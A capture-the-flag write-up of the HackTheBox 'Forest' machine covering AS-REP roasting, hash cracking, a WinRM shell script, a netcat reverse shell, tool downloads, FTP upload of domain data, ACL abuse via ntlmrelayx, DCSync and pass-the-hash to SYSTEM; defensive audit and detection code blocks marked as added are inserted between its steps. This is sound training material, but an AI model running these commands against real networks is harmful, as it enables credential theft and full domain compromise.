As usual, first an nmap scan

root@kalivm:~/Forest# nmap -sTV -p 1-65535 -oN fullscan_tcp
Starting Nmap 7.80 ( ) at 2020-01-06 11:47 CET
Nmap scan report for
Host is up (0.016s latency).
Not shown: 65511 closed ports
53/tcp    open  domain?
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2019-10-21 09:54:20Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
49674/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc        Microsoft Windows RPC
49682/tcp open  msrpc        Microsoft Windows RPC
49701/tcp open  msrpc        Microsoft Windows RPC
49913/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 159.67 seconds

There are already several interesting things in this result. First of all, this is a domain-joined system in the HTB.local domain. It exposes Kerberos, LDAP and SMB to the outside world and looks like a domain controller. And last but not least, a WinRM port (5985) is open. This could be an attack similar to the approach I took a long time ago for the ‘Active’ machine on Hackthebox, combined with the WinRM attack on Heist!

First let’s try enum4linux to see if I can list some more information.

root@kalivm:~/Forest# enum4linux -a
Starting enum4linux v0.8.9 
|    Target Information    |
Target ...........
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
|    Getting domain SID for    |
Domain Name: HTB
Domain Sid: S-1-5-21-3072663084-364016917-1341370565
[+] Host is part of a domain (not a workgroup)
|    Users on    |
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
|    Password Policy Information for    |
[+] Attaching to using a NULL share
[+] Trying protocol 445/SMB...
[+] Found domain(s):
    [+] HTB
    [+] Builtin
[+] Password Info for Domain: HTB
    [+] Minimum password length: 7
    [+] Password history length: 24
    [+] Maximum password age: 41 days 23 hours 53 minutes 
    [+] Password Complexity Flags: 000000
        [+] Domain Refuse Password Change: 0
        [+] Domain Password Store Cleartext: 0
        [+] Domain Password Lockout Admins: 0
        [+] Domain Password No Clear Change: 0
        [+] Domain Password No Anon Change: 0
        [+] Domain Password Complex: 0
    [+] Minimum password age: 1 day 4 minutes 
    [+] Reset Account Lockout Counter: 30 minutes 
    [+] Locked Account Duration: 30 minutes 
    [+] Account Lockout Threshold: None
    [+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 7
|    Groups on    |
[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]
[+] Getting domain group memberships:
Group 'Enterprise Admins' (RID: 519) has member: HTB\Administrator
Group 'Privileged IT Accounts' (RID: 1149) has member: HTB\Service Accounts
Group 'Service Accounts' (RID: 1148) has member: HTB\svc-alfresco
Group 'Domain Controllers' (RID: 516) has member: HTB\FOREST$
Group 'Exchange Trusted Subsystem' (RID: 1119) has member: HTB\EXCH01$
enum4linux complete on Mon Oct 21 12:05:29 2019

The enum4linux output shows several interesting things. First of all, I see that there are some regular users (sebastien, lucinda, andy, mark, santi) and a clear service account (svc-alfresco).
Furthermore, no password complexity seems to be enforced, which can mean easy-to-guess or crackable passwords. There also seems to be a Microsoft Exchange installation, which is commonly known to be a major security risk if not properly configured! And the last lines confirm the suspicion: Forest is indeed a member of the Domain Controllers group! So I started browsing the impacket tools and trying several until I got to the tool.

root@kalivm:~/Forest# -dc-ip -no-pass HTB/sebastien
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for sebastien
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
root@kalivm:~/Forest# -dc-ip -no-pass HTB/lucinda
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for lucinda
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
root@kalivm:~/Forest# -dc-ip -no-pass HTB/svc-alfresco
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for svc-alfresco

After trying it for several users, I finally got an AS-REP for the user svc-alfresco (the tool calls it a TGT; the hash type is Kerberos 5 AS-REP etype 23), which I could try cracking with hashcat.
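The error message "doesn't have UF_DONT_REQUIRE_PREAUTH set" refers to a single bit in the account's userAccountControl attribute; svc-alfresco differs from sebastien and lucinda only in having that bit set. The following added example (not code from the write-up or from Impacket) decodes userAccountControl values and lists the enabled accounts that would answer an AS-REP request without pre-authentication, which is the audit a defender runs to find and clear the flag. The account records are constructed; the user names come from the write-up, the flag values are assumed.

```python
# Added example (not from the original write-up): audit userAccountControl for
# accounts that do not require Kerberos pre-authentication (AS-REP roastable).
# The records below are constructed; the names come from the write-up, the flag
# values are assumed.

# userAccountControl bit values as documented by Microsoft (ADS_USER_FLAG_ENUM).
UAC_FLAGS = {
    0x0002:    "ACCOUNTDISABLE",
    0x0010:    "LOCKOUT",
    0x0020:    "PASSWD_NOTREQD",
    0x0200:    "NORMAL_ACCOUNT",
    0x10000:   "DONT_EXPIRE_PASSWORD",
    0x80000:   "TRUSTED_FOR_DELEGATION",
    0x400000:  "DONT_REQUIRE_PREAUTH",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}
DONT_REQUIRE_PREAUTH = 0x400000   # 4194304 decimal, the bit Impacket checks
ACCOUNTDISABLE = 0x0002


def decode_uac(value):
    """Return the names of all known flags set in a userAccountControl value."""
    value = int(value)
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def asrep_roastable(records):
    """Return sAMAccountNames of enabled accounts with DONT_REQUIRE_PREAUTH set.

    `records` is an iterable of dicts with 'sAMAccountName' and
    'userAccountControl' keys, the shape an LDAP search using the bitwise
    filter (userAccountControl:1.2.840.113556.1.4.803:=4194304) would return.
    Disabled accounts are skipped: the KDC will not issue an AS-REP for them.
    """
    hits = []
    for rec in records:
        uac = int(rec["userAccountControl"])
        if uac & DONT_REQUIRE_PREAUTH and not uac & ACCOUNTDISABLE:
            hits.append(rec["sAMAccountName"])
    return hits


# Constructed sample data modelled on the accounts in the write-up.
# 0x200 = NORMAL_ACCOUNT, 0x400200 = NORMAL_ACCOUNT | DONT_REQUIRE_PREAUTH,
# 0x400202 additionally has ACCOUNTDISABLE set.
SAMPLE_USERS = [
    {"sAMAccountName": "sebastien",    "userAccountControl": 0x200},
    {"sAMAccountName": "lucinda",      "userAccountControl": 0x200},
    {"sAMAccountName": "svc-alfresco", "userAccountControl": 0x400200},
    {"sAMAccountName": "old-svc",      "userAccountControl": 0x400202},
]

if __name__ == "__main__":
    for user in SAMPLE_USERS:
        flags = ", ".join(decode_uac(user["userAccountControl"]))
        print(f"{user['sAMAccountName']:14} {flags}")
    print("AS-REP roastable:", asrep_roastable(SAMPLE_USERS))
```

The remediation is to clear the flag on every account the audit returns (very few applications genuinely need it) and to make sure such accounts have long passwords, since the AS-REP is encrypted with a key derived from the password alone.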

[hashcat] $ hashcat -m 18200 -a 0 -w 3 forest.hash rockyou.txt
Dictionary cache hit:
* Filename..: rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 AS-REP etype 23
Hash.Target......: $krb5asrep$23$svc-alfresco@HTB:a886b951410cd0d9b804...a751ba
Time.Started.....: Fri Oct 25 12:37:07 2019 (1 sec)
Time.Estimated...: Fri Oct 25 12:37:08 2019 (0 secs)
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 13838.5 kH/s (13.64ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 4587520/14344385 (31.98%)
Rejected.........: 0/4587520 (0.00%)
Restore.Point....: 3932160/14344385 (27.41%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: seaford123 ->
Hardware.Mon.#1..: Temp: 41c Fan: 24% Util: 46% Core:1898MHz Mem:3802MHz Bus:16

So apparently svc-alfresco’s password is s3rvice. The next thing I did was tweak the WinRM shell I made earlier for Hackthebox – Heist to include the correct username, password and IP address

require 'winrm'

# WinRM endpoint of the target (elided from the original post), e.g. http://<host>:5985/wsman
conn = WinRM::Connection.new(
  endpoint: '',
  user: 'svc-alfresco',
  password: 's3rvice'
)

command = ""
# Open one PowerShell runspace and reuse it for every command typed at the prompt
conn.shell(:powershell) do |shell|
  until command == "exit\n" do
    print "PS > "
    command = gets
    break if command.nil?   # EOF (Ctrl-D) ends the session as well
    output = shell.run(command) do |stdout, stderr|
      STDOUT.print stdout
      STDERR.print stderr
    end
    puts "Exiting with code #{output.exitcode}"
  end
end

and run it to get shell access.

root@kalivm:~/Forest# ruby shell.rb 
PS > whoami

All that is left is to grab the user flag (user.txt) and start escalating privileges

PS > type ..\Desktop\user.txt

Privilege Escalation

The next step is escalating privileges. After pressing CTRL-C one time too many, I decided it was time to set up a simple fallback.

root@kalivm:~/Forest# ruby shell.rb
PS > mkdir sedje
PS > cd sedje
PS > IWR -uri -outfile nc.exe

PS > ./nc 9002 -e powershell.exe
root@kalivm:~/Forest# nc -nvlp 9002
Listening on 9002
Connection received on 50030
Windows PowerShell 
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Users\svc-alfresco\Documents\sedje>
PS C:\Users\svc-alfresco\Documents\sedje> IWR -uri -outfile SharpHound.ps1
PS C:\Users\svc-alfresco\Documents\sedje> IWR -uri -outfile SharpHound.exe
PS C:\Users\svc-alfresco\Documents\sedje> Import-Module .\SharpHound.ps1
PS C:\Users\svc-alfresco\Documents\sedje> Invoke-BloodHound -CollectionMethod All -LDAPUser svc-alfresco -LDAPPass s3rvice
PS C:\Users\svc-alfresco\Documents\sedje> dir

    Directory: C:\Users\svc-alfresco\Documents\sedje

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        10/25/2019   5:20 AM          12950
-a----        10/25/2019   5:20 AM           9151 Rk9SRVNU.bin
-a----        10/25/2019   5:18 AM         751616 SharpHound.exe
-a----        10/25/2019   5:17 AM         886595 SharpHound.ps1

After the SharpHound script and binary are transferred, I run them as svc-alfresco and the script produces a zip file with all relevant domain data. All that remains is to transfer the file to my local machine and analyze it with BloodHound. The easiest and most common way I learned during my OSCP journey is to create and run a small FTP script.

PS C:\Users\svc-alfresco\Documents\sedje> echo "open" > ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "anonymous" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "put" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "quit" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> ftp -s:ftp 
Log in with USER and PASS first.
User ( 

Of course, this approach requires a running FTP server on my attacking machine, which is easily done with Python's pyftpdlib module

root@kalivm:~/Forest# python -m pyftpdlib -p 21 -w
/usr/lib/python2.7/dist-packages/pyftpdlib/ RuntimeWarning: write permissions assigned to anonymous user.
[I 2019-10-25 13:15:13] >>> starting FTP server on, pid=5057 < <<
[I 2019-10-25 13:15:13] concurrency model: async
[I 2019-10-25 13:15:13] masquerade (NAT) address: None
[I 2019-10-25 13:15:13] passive ports: None
[I 2019-10-25 13:15:27][] FTP session opened (connect)
[I 2019-10-25 13:15:27][anonymous] USER 'anonymous' logged in.
[I 2019-10-25 13:15:27][anonymous] STOR /root/Documents/htb/Machines/Forest/ completed=1 bytes=12950 seconds=0.07
[I 2019-10-25 13:15:27][anonymous] FTP session closed (disconnect).

So the zip file has been transferred successfully and can be loaded directly into BloodHound by simply dragging and dropping it onto the interface.

In the BloodHound overview of the shortest paths to Domain Admins, I see that a member of the ‘Exchange Windows Permissions’ group has the ability to modify the ACL of the HTB.LOCAL domain object itself, which can be used to grant access to, for example, the password hashes. I can also see that the svc-alfresco user has GenericAll permissions on that particular group through its nested memberships of `Service Accounts`, `Privileged IT Accounts` and `Account Operators`.

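What BloodHound computes here is a shortest path over a graph whose edges are group memberships and ACL rights. The following added example (not code from the write-up or from BloodHound) rebuilds that path in miniature for the nodes the post mentions, using BloodHound's edge names (MemberOf, GenericAll, WriteDacl), and then separates the plain memberships from the ACL edges a defender would want to cut. The edge list is constructed from the post's description; attaching the GenericAll edge to Account Operators is an assumption.

```python
# Added example (not from the original write-up or from BloodHound): a tiny
# BloodHound-style graph of the escalation path described in the post, with a
# breadth-first search for the shortest path to the domain object. The edges
# are constructed from the post; the source of the GenericAll edge is assumed.
from collections import deque

# (source, edge kind, target): group memberships and ACL rights.
EDGES = [
    ("svc-alfresco@htb.local",                 "MemberOf",   "service accounts@htb.local"),
    ("service accounts@htb.local",             "MemberOf",   "privileged it accounts@htb.local"),
    ("privileged it accounts@htb.local",       "MemberOf",   "account operators@htb.local"),
    ("account operators@htb.local",            "GenericAll", "exchange windows permissions@htb.local"),
    ("exchange windows permissions@htb.local", "WriteDacl",  "htb.local"),
    ("sebastien@htb.local",                    "MemberOf",   "domain users@htb.local"),
]


def build_graph(edges):
    """Adjacency list: node -> list of (edge kind, neighbour)."""
    graph = {}
    for src, kind, dst in edges:
        graph.setdefault(src, []).append((kind, dst))
    return graph


def shortest_path(graph, start, goal):
    """BFS; returns the hops [(node, edge kind, node), ...] from start to goal, or None."""
    queue = deque([start])
    prev = {start: None}          # node -> (parent node, edge kind) used to reach it
    while queue:
        node = queue.popleft()
        if node == goal:
            hops = []
            while prev[node] is not None:
                parent, kind = prev[node]
                hops.append((parent, kind, node))
                node = parent
            return list(reversed(hops))
        for kind, nxt in graph.get(node, []):
            if nxt not in prev:
                prev[nxt] = (node, kind)
                queue.append(nxt)
    return None


def dangerous_edges(path):
    """The hops a defender should remove: every edge that is an ACL right, not a membership."""
    return [hop for hop in path if hop[1] != "MemberOf"]


if __name__ == "__main__":
    graph = build_graph(EDGES)
    path = shortest_path(graph, "svc-alfresco@htb.local", "htb.local")
    for src, kind, dst in path:
        print(f"{src}  --{kind}-->  {dst}")
    print("ACL edges to cut:", [(s, k, d) for s, k, d in dangerous_edges(path)])
```

The point of separating the two edge kinds is that memberships like Service Accounts are usually intentional, whereas an ACL edge such as GenericAll from Account Operators onto an Exchange group, or WriteDacl from that group onto the domain object, is what turns an unprivileged service account into a path to every password hash in the domain.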
PS C:\Users\svc-alfresco\Documents\sedje> IWR -uri -outfile Powerview.ps1
PS C:\Users\svc-alfresco\Documents\sedje> Import-Module .\PowerView.ps1
PS C:\Users\svc-alfresco\Documents\sedje> $SecPassword = ConvertTo-SecureString 's3rvice' -AsPlainText -Force
PS C:\Users\svc-alfresco\Documents\sedje> $Cred = New-Object System.Management.Automation.PSCredential('HTB\svc-alfresco', $SecPassword)
PS C:\Users\svc-alfresco\Documents\sedje> New-DomainUser -SamAccountName sedje -AccountPassword $SecPassword -Credential $Cred | Add-DomainGroupMember 'Exchange Windows Permissions' -Credential $Cred

When you add the svc-alfresco account to the ‘Exchange Windows Permissions’ group, the membership is removed again after a few minutes, which is quite a pain. So I decided to add my own user (sedje) to the domain with the same password as svc-alfresco and add it to the `Exchange Windows Permissions` group. After that, however, I got stuck for a long time on the very specific syntax and switches required (and available) with the impacket tools. If some Discord users had not helped me, I would probably have given up in the end, so I have to thank them for pushing me through the next step!

root@kalivm:~/Forest# --escalate-user sedje -t ldap://
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server

[*] Servers started, waiting for connections

Now all I have to do is browse to the relay's local HTTP listener and provide valid credentials; ntlmrelayx does all the hard work and changes the domain permissions for me. So I open a browser to localhost and provide the sedje credentials.

[*] HTTPD: Received connection from, attacking target ldap://
[*] HTTPD: Client requested path: /
[*] HTTPD: Client requested path: /
[*] HTTPD: Client requested path: /
[*] Authenticating against ldap:// as \sedje SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] User privileges found: Create user
[*] User privileges found: Modifying domain ACL
[*] Querying domain security descriptor
[*] Success! User sedje now has Replication-Get-Changes-All privileges on the domain
[*] Try using DCSync with and this user :)
[*] Saved restore state to aclpwn-20191025-135738.restoresedsedss

And the output already tells me what to do next: sedje now has the replication permissions needed to continue

root@kalivm:~/Forest# htb/sedje:s3rvice@
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
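The "DRSUAPI method" means the hashes are pulled through the directory replication service, exactly as a domain controller would replicate them, which is why the Replication-Get-Changes-All right was needed. On the DC this shows up as event ID 4662 with the replication control access rights in the Properties field. The following added example (not code from the write-up or from Impacket) is the detection logic: it flags 4662 events that exercise those rights from any account that is not a domain controller machine account. The events are constructed, field names follow the 4662 schema, and the account names come from the write-up.

```python
# Added example (not from the original write-up): detect DCSync-style
# replication requests in Windows Security event ID 4662. The events below are
# constructed; field names follow the 4662 schema, the accounts come from the post.
import re

# Control access right GUIDs from the AD schema (Extended-Rights container).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}", re.I)


def replication_rights(event):
    """Names of replication rights referenced in a 4662 event's Properties field."""
    guids = GUID_RE.findall(event.get("Properties", ""))
    return sorted({REPLICATION_RIGHTS[g.lower()] for g in guids if g.lower() in REPLICATION_RIGHTS})


def suspicious_dcsync(events, dc_accounts):
    """Return alerts for replication requests from accounts other than known DCs.

    `dc_accounts` is the set of domain controller machine accounts (e.g. {"FOREST$"});
    replication between DCs is normal, replication by a user account is not.
    """
    alerts = []
    for ev in events:
        if int(ev.get("EventID", 0)) != 4662:
            continue
        rights = replication_rights(ev)
        if not rights:
            continue
        user = ev["SubjectUserName"]
        if user.endswith("$") and user in dc_accounts:
            continue
        alerts.append({
            "account": f"{ev['SubjectDomainName']}\\{user}",
            "rights": rights,
            "time": ev.get("TimeCreated", ""),
        })
    return alerts


# Constructed sample events. 19195a5b-... is the domainDNS class GUID,
# AccessMask 0x100 is "Control Access"; %%7688 is the usual prefix in Properties.
SAMPLE_EVENTS = [
    {"EventID": 4662, "TimeCreated": "2019-10-25T13:58:01", "SubjectDomainName": "HTB",
     "SubjectUserName": "FOREST$", "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
     "AccessMask": "0x100", "Properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "TimeCreated": "2019-10-25T13:58:10", "SubjectDomainName": "HTB",
     "SubjectUserName": "sedje", "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
     "AccessMask": "0x100", "Properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
                                          "\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "TimeCreated": "2019-10-25T13:58:12", "SubjectDomainName": "HTB",
     "SubjectUserName": "sedje", "ObjectType": "%{bf967aba-0de6-11d0-a285-00aa003049e2}",
     "AccessMask": "0x10", "Properties": "%%7688\n\t{00000000-0000-0000-0000-000000000000}"},
]

if __name__ == "__main__":
    for alert in suspicious_dcsync(SAMPLE_EVENTS, {"FOREST$"}):
        print(f"ALERT {alert['time']} {alert['account']} requested {', '.join(alert['rights'])}")
```

Two practical notes: 4662 is only generated when "Audit Directory Service Access" is enabled and a SACL on the domain object covers the replication rights, and an allow-list of DC accounts is the right filter because Azure AD Connect and similar legitimate sync accounts also exercise these rights and should be added to it explicitly rather than ignored wholesale.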

Use to get all the hashes in the domain

root@kalivm:~/Forest# -hashes :32693b11e6aa90eb43d32c72a07ceea6 htb/administrator@ powershell.exe
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on
[*] Found writable share ADMIN$
[*] Uploading file ezaVoayr.exe
[*] Opening SVCManager on
[*] Creating service CAke on
[*] Starting service CAke.....
[!] Press help for extra shell commands
Windows PowerShell 
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32> type c:\Users\Administrator\Desktop\root.txt
type c:\Users\Administrator\Desktop\root.txt

Author: Puckiestyle
